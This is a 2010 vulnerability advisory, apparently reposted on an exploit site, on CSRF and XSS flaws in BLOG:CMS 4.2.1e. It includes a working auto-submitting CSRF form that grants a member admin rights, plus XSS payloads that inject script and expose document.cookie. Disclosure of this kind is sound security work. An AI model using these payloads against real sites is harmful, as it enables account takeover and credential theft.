ExploitFixes
BLOG:CMS <= v4.2.1e Multiple Vulnerabilities 2010-12-15 10:15:43

Vulnerability ID: HTB22727
Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_blogcms.html
Product: BLOG:CMS
Vendor: Radek Hul&aacute;n ( http://blogcms.com/ )
Vulnerable Version: 4.2.1.e and probably prior versions
Vendor Notification: 30 November 2010
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Status: Not Fixed, Vendor Alerted
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking &amp; Penetration Testing (http://www.htbridge.ch/)

XSRF/CSRF:
Vulnerability Details:
The vulnerability exists due to failure in the &quot;admin/libs/ADMIN.php&quot; script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:


&lt;form action=&quot;http://host/admin/index.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;changemembersettings&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;memberid&quot; value=&quot;USER_UD&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;tester&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;realname&quot; value=&quot;tester&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;repeatpassword&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;[email protected]&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;url&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;admin&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;canlogin&quot; value=&quot;1&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;notes&quot; value=&quot;&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;deflang&quot; value=&quot;&quot;&gt;
&lt;/form&gt;
&lt;script&gt;
document.main.submit();
&lt;/script&gt;


Stored XSS (HTB22724):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the &quot;action.php&quot; script to properly sanitize user-supplied input in &quot;body&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. Enter comment like &lt;script&gt;alert('XSS')&lt;/script&gt; in &quot;Add new comment&quot; form.


XSS (HTB22725):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the &quot;admin/index.php&quot; script to properly sanitize user-supplied input in &quot;amount&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

&lt;form action=&quot;http://host/admin/index.php&quot; method=&quot;post&quot; name=&quot;main&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;blogid&quot; value=&quot;0&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;itemid&quot; value=&quot;0&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;action&quot; value=&quot;browseowncomments&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;amount&quot; value='10&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;'&gt;
&lt;input type=&quot;hidden&quot; name=&quot;start&quot; value=&quot;0&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;search&quot; value=&quot;&quot;&gt;
&lt;/form&gt;
&lt;script&gt;
document.main.submit();
&lt;/script&gt;

Solution: Upgrade to the most recent version


XSS(HTB22726):
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the &quot;admin/index.php&quot; script to properly sanitize user-supplied input in &quot;action&quot; variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/index.php?action=settingsedit&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
Solution: Upgrade to the most recent version